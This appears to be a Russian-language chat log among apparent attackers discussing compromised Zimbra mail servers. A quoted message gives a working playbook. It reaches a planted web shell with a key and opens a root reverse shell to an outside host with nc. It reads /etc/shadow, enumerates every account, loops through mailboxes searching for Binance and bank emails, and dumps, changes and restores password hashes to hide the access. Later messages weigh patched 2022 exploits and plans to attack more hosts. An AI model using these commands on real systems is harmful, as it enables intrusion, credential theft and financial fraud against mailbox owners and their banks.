[2024-04-06 05:29:04] @usernamegg:matrix.bestflowers247.online: доброе
--------------------
[2024-04-06 05:29:14] @usernamegg:matrix.bestflowers247.online: ну что будут у нас цели с этого эксплойта ?)
--------------------
[2024-04-06 07:55:24] @usernamenn:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> ```
> [19:30:11] Th1nkAb0ut: Общение с доступом удобнее всего через мой питон скрипт, там ничего нет, он не большой, можно быстро проверить.
>
> Подключение к шелу:
> python3 shell.py --base_url="zimbraAdmin/public/jsp" --web_shell_filename="ZimbraAdmin.jsp" --key vbptxxwjdxsfrgzgeudtfffawmbcbhcx --target https://ip host
> У сервера есть таймаут, поэтому, если запускать через него что-то, что будет работать долго, то вариант запустить, с выводом в файл и потом прочитать резуольтат. Удобнее через реверс шелл работать.
>
> Полезные команды:
> рутовый реверс шелл:
> reverse 11.22.33.255 3434 /usr/lib/sftp
> на принимающем сервере nc -lvp 3439
>
> выполнить из под рута из шела:
> /usr/lib/sftp -p -c "cat /etc/shadow"
>
> посмотреть все аккаунты:
> /opt/zimbra/bin/zmprov -l gaa
>
> поиск внутри аккаунта:
> /opt/zimbra/bin/zmmailbox -z -m user@domain.com s -t message -l 10 "in:Inbox From:@binance.com"
>
> [19:30:12] Th1nkAb0ut: язык поисковых запросов https://wiki.zimbra.com/wiki/Zimbra_Web_Client_Search_Tips
>
> Можно в цикле запустить
> for account in `/opt/zimbra/bin/zmprov -l gaa`; do echo $account; /opt/zimbra/bin/zmmailbox -z -m $account s -t message -l 10 "in:Inbox AND content:(pncbank.com OR svb.com OR truist.com OR bankofthewest.com)"; done
>
> вывод сообщения по айди:
> /opt/zimbra/bin/zmmailbox -z -m user@domain.com gm 1661 -
>
> Получить хеш пароля:
> /opt/zimbra/bin/zmprov -l ga "user@domain.com" userPassword
>
> Изменить пароль:
> /opt/zimbra/bin/zmprov sp user@domain.com 123qqq12
>
> Вернуть пароль на первоначальный:
> /opt/zimbra/bin/zmprov -l ma user@domain.com userPassword "{SSHA512}Y4msQuKsBxTOgZFnxmbstqI5KhQ61EetTHjS0vxi0UT2lm/PQ4jG0X8VqUzedNYlUz3OZJs+OMaXpKC/c/1rq7ycTwL1FKPY"
>
>
> Если совсем страшно моим скриптом пользоваться - там все просто, можно самому накидать автоматизацию.
> Вот пример общения через curl, где JCMD - команда в base64, которая исполняется в терминале. JSESSIONID - ключ в base64 (--key)
> ```

🤔
--------------------
[2024-04-06 07:58:19] @usernamenn:matrix.bestflowers247.online: напоминает чем то weevely вебшелл
--------------------
[2024-04-06 08:54:10] @n3auxaxl:matrix.collectionofmanager.space: привет
--------------------
[2024-04-06 08:54:12] @n3auxaxl:matrix.collectionofmanager.space: с какого этого?
--------------------
[2024-04-06 08:54:36] @n3auxaxl:matrix.collectionofmanager.space: с того, что zip отправлять больше нет
--------------------
[2024-04-06 08:54:41] @n3auxaxl:matrix.collectionofmanager.space: это же без смысла
--------------------
[2024-04-06 08:54:45] @n3auxaxl:matrix.collectionofmanager.space: его уже давно пофиксили
--------------------
[2024-04-06 08:54:48] @n3auxaxl:matrix.collectionofmanager.space: я же не волшебник
--------------------
[2024-04-06 08:55:13] @n3auxaxl:matrix.collectionofmanager.space: а вот отправкой почты занимаюсь щас
--------------------
[2024-04-06 08:55:22] @n3auxaxl:matrix.collectionofmanager.space: но его походу тоже пофиксили
--------------------
[2024-04-06 08:55:24] @n3auxaxl:matrix.collectionofmanager.space: эту rce
--------------------
[2024-04-06 08:55:39] @n3auxaxl:matrix.collectionofmanager.space: там чтобы пропатчить это достаточно обновить unrar
--------------------
[2024-04-06 08:55:57] @n3auxaxl:matrix.collectionofmanager.space: а в новых версиях уже перешли на 7zip архиватор
--------------------
[2024-04-06 08:56:03] @n3auxaxl:matrix.collectionofmanager.space: кароче хуйня эти сплойты 2022 года
--------------------
[2024-04-06 08:56:17] @n3auxaxl:matrix.collectionofmanager.space: это наиболее используемые уязвимости вообще
--------------------
[2024-04-06 08:56:20] @n3auxaxl:matrix.collectionofmanager.space: они там в топ вошли
--------------------
[2024-04-06 08:56:31] @n3auxaxl:matrix.collectionofmanager.space: видимо эту зимбру ебали очень долго и очень сильно
--------------------
[2024-04-06 08:57:12] @n3auxaxl:matrix.collectionofmanager.space: то что чисто физически мог сделать, сделал
--------------------
[2024-04-06 08:57:44] @n3auxaxl:matrix.collectionofmanager.space: отправку почты добью, чтобы она тоже норм работала
--------------------
[2024-04-06 14:33:37] @usernamegg:matrix.bestflowers247.online: я тут
--------------------
[2024-04-06 14:33:41] @usernamegg:matrix.bestflowers247.online: чел этот придет в пн
--------------------
[2024-04-06 14:33:56] @usernamegg:matrix.bestflowers247.online: я попробую побольше информации узнать
--------------------
[2024-04-06 14:35:07] @n3auxaxl:matrix.collectionofmanager.space: +++
--------------------
[2024-04-06 14:35:16] @n3auxaxl:matrix.collectionofmanager.space: такой гемор если честно)
--------------------
[2024-04-06 14:35:20] @n3auxaxl:matrix.collectionofmanager.space: зимбра эта
--------------------
[2024-04-06 14:35:34] @n3auxaxl:matrix.collectionofmanager.space: у меня аж запал если честно нагнуть эти хосты
--------------------
[2024-04-06 14:35:40] @n3auxaxl:matrix.collectionofmanager.space: щас если с этой почтой не получиться
--------------------
[2024-04-06 14:35:58] @n3auxaxl:matrix.collectionofmanager.space: то я попробую поставить зимбру ластовую и поискать что то интересное
--------------------
[2024-04-06 14:36:25] @n3auxaxl:matrix.collectionofmanager.space: может выйдет что то с этого хорошее
--------------------
[2024-04-06 14:42:38] @n3auxaxl:matrix.collectionofmanager.space: да, сегодня еще по зимбре посижу, а завтра уже займусь рефлективкой
--------------------
[2024-04-06 14:42:50] @n3auxaxl:matrix.collectionofmanager.space: а то отвлекся из-за зимбры
--------------------
